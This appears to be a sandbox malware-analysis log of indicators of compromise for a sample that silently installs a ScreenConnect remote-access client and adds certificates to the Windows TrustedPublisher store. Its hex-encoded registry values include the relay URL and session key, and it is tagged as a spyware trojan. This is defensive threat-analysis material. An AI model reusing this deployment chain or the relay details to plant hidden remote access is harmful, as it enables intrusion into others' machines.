Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gc_scre..tion_195e87a1d62ee085\LastRunVersion = 68747470733a2f2f636f6c6f6e69616c3332312e73637265656e636f6e6e6563742e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2f53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924\identity = 53637265656e436f6e6e6563742e436c69656e74536572766963652c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924\Files\ScreenConnect.ClientService.dll_e781b1c63 = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9\identity = 53637265656e436f6e6e6563742e436f72652c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\lock!16000000cb56570e8807000088080000000000000000000 = 30303030303738382c30316461613231393638323038663263	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Transform = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9\DigestValue = 334202965b07ab69f08b16fed0ee6c7274463556	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9\Transform = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9\Files\ScreenConnect.Windows.dll_fc0d83aff7df0b5 = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_629c4ac188703c2a\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd508 = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\F_scre..tion_25b0fbb6ef7eb094_61394a8361ba1ee4\LastRunVersion = 68747470733a2f2f636f6c6f6e69616c3332312e73637265656e636f6e6e6563742e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2f53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb = 680074007400700073003a002f002f0063006f006c006f006e00690061006c003300320031002e00730063007200650065006e0063006f006e006e006500630074002e0063006f006d002f00420069006e002f00530063007200650065006e0043006f006e006e006500630074002e0043006c00690065006e0074002e006100700070006c00690063006100740069006f006e003f0065003d0053007500700070006f0072007400260079003d0047007500650073007400260068003d0069006e007300740061006e00630065002d007900620065003100750034002d00720065006c00610079002e00730063007200650065006e0063006f006e006e006500630074002e0063006f006d00260070003d00340034003300260073003d00390061006600340033003000310035002d0038003300310063002d0034003500340036002d0038003700660035002d0065003300310065003200620064003800380066003300620026006b003d0042006700490041004100410043006b00410041004200530055003000450078004100410067004100410041004500410041005100420039006f005a006b0048006f00380066004c005700540069004f00740061005700500044005000720036004600680038007600630072006600430045002500320066003500550063003800740054006c0045003700580051007200690053006a005000730049007a00630041004f0036007500320055007a003200710071005700710076006f00700066003000740068007a004100340044006f0050007a00510075007400500078006100560045004b0072002500320062007a00430046004c00250032006600560037005a007a004f004a004f006d00350035005700650033006a0050007000680034003600480062006a005300630033005a0042003900380041007300690042003700570045002500320066004c006400390034006c0036004d00650061004a006100470045004f004c0075007700610068005600570030006c0049004f0067004f003300530062007800450038005a00250032006200750052004f0067003300410055006b00350037007200700064006600310074004100770038005a0064004a006f0068005a00620051004f006b0045006d00360056006b00360065004d0034006a00450065006b003600490069004b0059004d006800530073006d0078003500470056004b004800380055004c004900510044003800510037007000740077006b0075003400530079007100300056007500670069007900650071003100430045007200730065006a005900440043006e00720062005a005600440058003400740051004600460071006e00740030004e004600480053004f0076005400760025003200660071005100690062004c0070006f0078004d00520048004200620030004b00530072006300500068006c00680079007800510064006f00680074006b0057007a0039004e005700680052006400330061007700660072004c0077006c004c00300071006e0058006e0035006200540047007800260072003d00260069003d0055006e007400690074006c0065006400250032003000530065007300730069006f006e000000	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9\identity = 53637265656e436f6e6e6563742e57696e646f77732c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\Transform = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_629c4ac188703c2a\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\lock!08000000bb56570e8807000088080000000000000000000 = 30303030303738382c30316461613231393638323038663263	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_629c4ac188703c2a	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_none_4b563d129b766e28\implication!scre..tion_25b0fbb6ef7eb094_0017.0009_89 = 68747470733a2f2f636f6c6f6e69616c3332312e73637265656e636f6e6e6563742e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd\identity = 53637265656e436f6e6e6563742e436c69656e742c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9\lock!0e000000bb56570e8807000088080000000000000000000 = 30303030303738382c30316461613231393638323038663263	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\NonCanonicalData	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_629c4ac188703c2a\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\F_scre..tion_25b0fbb6ef7eb094_61394a8361ba1ee4	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\lock!010000004455570e64070000f80d0000000000000000000 = 30303030303736342c30316461613231393635306234336234	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb = 68747470733a2f2f636f6c6f6e69616c3332312e73637265656e636f6e6e6563742e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2f53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924\implication!scre..tion_25b0fbb6ef7eb094_0017.0009_89 = 68747470733a2f2f636f6c6f6e69616c3332312e73637265656e636f6e6e6563742e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\identity = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gc_scre..tion_195e87a1d62ee085	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\VisibilityRoots	dfsvc.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb = 3c004100700070006c00690063006100740069006f006e00540072007500730074002000760065007200730069006f006e003d002200310022000d000a00460075006c006c004e0061006d0065003d002200680074007400700073003a002f002f0063006f006c006f006e00690061006c003300320031002e00730063007200650065006e0063006f006e006e006500630074002e0063006f006d002f00420069006e002f00530063007200650065006e0043006f006e006e006500630074002e0043006c00690065006e0074002e006100700070006c00690063006100740069006f006e002300530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f007700730043006c00690065006e0074002e006100700070006c00690063006100740069006f006e002c002000560065007200730069006f006e003d00320033002e0039002e00310030002e0038003800310037002c002000430075006c0074007500720065003d006e00650075007400720061006c002c0020005000750062006c00690063004b006500790054006f006b0065006e003d0032003500620030006600620062003600650066003700650062003000390034002c002000700072006f0063006500730073006f0072004100720063006800690074006500630074007500720065003d006d00730069006c002f00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f007700730043006c00690065006e0074002e006500780065002c002000560065007200730069006f006e003d00320033002e0039002e00310030002e0038003800310037002c002000430075006c0074007500720065003d006e00650075007400720061006c002c0020005000750062006c00690063004b006500790054006f006b0065006e003d0032003500620030006600620062003600650066003700650062003000390034002c002000700072006f0063006500730073006f0072004100720063006800690074006500630074007500720065003d006d00730069006c002c00200074007900700065003d00770069006e003300320022000d000a00540072007500730074006500640054006f00520075006e003d002200740072007500650022000d000a0050006500720073006900730074003d002200740072007500650022003e000d000a003c00440065006600610075006c0074004700720061006e0074003e000d000a003c0050006f006c00690063007900530074006100740065006d0065006e0074002000760065007200730069006f006e003d002200310022003e000d000a003c005000650072006d0069007300730069006f006e00530065007400200063006c006100730073003d002200530079007300740065006d002e00530065006300750072006900740079002e005000650072006d0069007300730069006f006e0053006500740022000d000a00760065007200730069006f006e003d002200310022000d000a00490044003d00220043007500730074006f006d0022000d000a00530061006d00650053006900740065003d002200730069007400650022000d000a0055006e0072006500730074007200690063007400650064003d002200740072007500650022000d000a0078006d006c006e0073003a00610073006d00760031003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a00610073006d002e007600310022000d000a0078006d006c006e0073003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a00610073006d002e007600320022000d000a0078006d006c006e0073003a00610073006d00760032003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a00610073006d002e007600320022000d000a0078006d006c006e0073003a007800730069003d00220068007400740070003a002f002f007700770077002e00770033002e006f00720067002f0032003000300031002f0058004d004c0053006300680065006d0061002d0069006e007300740061006e006300650022000d000a0078006d006c006e0073003a0063006f002e00760031003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a0063006c00690063006b006f006e00630065002e007600310022000d000a0078006d006c006e0073003a00610073006d00760033003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a00610073006d002e007600330022000d000a0078006d006c006e0073003a0064007300690067003d00220068007400740070003a002f002f007700770077002e00770033002e006f00720067002f0032003000300030002f00300039002f0078006d006c006400730069006700230022000d000a0078006d006c006e0073003a0063006f002e00760032003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a0063006c00690063006b006f006e00630065002e007600320022003e000d000a003c0049005000650072006d0069007300730069006f006e00200063006c006100730073003d002200530079007300740065006d002e004e00650074002e005700650062005000650072006d0069007300730069006f006e002c002000530079007300740065006d002c002000560065007200730069006f006e003d0032002e0030002e0030002e0030002c002000430075006c0074007500720065003d006e00650075007400720061006c002c0020005000750062006c00690063004b006500790054006f006b0065006e003d00620037003700610035006300350036003100390033003400650030003800390022000d000a00760065007200730069006f006e003d002200310022003e000d000a003c0043006f006e006e006500630074004100630063006500730073003e000d000a003c0055005200490020007500720069003d00220028006800740074007000730029003a002f002f0063006f006c006f006e00690061006c003300320031005c002e00730063007200650065006e0063006f006e006e006500630074005c002e0063006f006d002f002e002a0022002f003e000d000a003c002f0043006f006e006e006500630074004100630063006500730073003e000d000a003c002f0049005000650072006d0069007300730069006f006e003e000d000a003c002f005000650072006d0069007300730069006f006e005300650074003e000d000a003c002f0050006f006c00690063007900530074006100740065006d0065006e0074003e000d000a003c002f00440065006600610075006c0074004700720061006e0074003e000d000a003c004500780074007200610049006e0066006f00200044006100740061003d00220030003000300031003000300030003000300030004600460046004600460046004600460030003100300030003000300030003000300030003000300030003000300030003000430030003200300030003000300030003000350037003500330037003900370033003700340036003500360044003200450035003700360039003600450036003400360046003700370037003300320045003400360036004600370032003600440037003300320043003200300035003600360035003700320037003300360039003600460036004500330044003300340032004500330030003200450033003000320045003300300032004300320030003400330037003500360043003700340037003500370032003600350033004400360045003600350037003500370034003700320036003100360043003200430032003000350030003700350036003200360043003600390036003300340042003600350037003900350034003600460036004200360035003600450033004400360032003300370033003700360031003300350036003300330035003300360033003100330039003300330033003400360035003300300033003800330039003000350030003100300030003000300030003000330030003500330037003900370033003700340036003500360044003200450035003300360035003600330037003500370032003600390037003400370039003200450035003000360046003600430036003900360033003700390032004500340031003700300037003000360043003600390036003300360031003700340036003900360046003600450035003400370032003700350037003300370034003400350037003800370034003700320036003100340039003600450036003600360046003000310030003000300030003000300031003800370032003600350037003100370035003600350037003300370034003700330035003300360038003600350036004300360043003400390036004500370034003600350036003700370032003600310037003400360039003600460036004500300030003000310030003200300030003000300030003000300030003000420022002f003e000d000a003c002f004100700070006c00690063006100740069006f006e00540072007500730074003e000d000a000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\DigestValue = 8807695ee8345e37efec43cbc0874277ed9b0a66	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files	dfsvc.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C	52b71d4c548dba2c6a3f1b53ce4dfda0_NeikiAnalytics.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c2000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e	52b71d4c548dba2c6a3f1b53ce4dfda0_NeikiAnalytics.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579	52b71d4c548dba2c6a3f1b53ce4dfda0_NeikiAnalytics.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 0300000001000000140000004c2272fba7a7380f55e2a424e9e624aee1c145792000000001000000640700003082076030820548a00302010202100b9360051bccf66642998998d5ba97ce300d06092a864886f70d01010b05003069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e67205253413430393620534841333834203230323120434131301e170d3232303831373030303030305a170d3235303831353233353935395a3065310b30090603550406130255533110300e06035504081307466c6f72696461310e300c0603550407130554616d706131193017060355040a1310436f6e6e656374776973652c204c4c433119301706035504031310436f6e6e656374776973652c204c4c4330820222300d06092a864886f70d01010105000382020f003082020a0282020100ec489826d08d2c6de21b3cd3676db1e0e50cb1ff75ff564e9741f9574aa3640aa8297294a05b4db68abd0760b6b05b50ce92ff42a4e390be776a43e9961c722f6b3a4d5c880bcc6a61b4026f9137d36b2b7e9b86055876b9fa860dbcb164fe7f4b5b9de4799ae4e02dc1f0bee01e5d032933a2827388f8db0b482e76c441b1bd50909ef2023e1fb62196c994ce052266b28cd89253e6416044133139764db5fc45702529536bf82c775f9ec81fa27dc409530325f40cdef95b81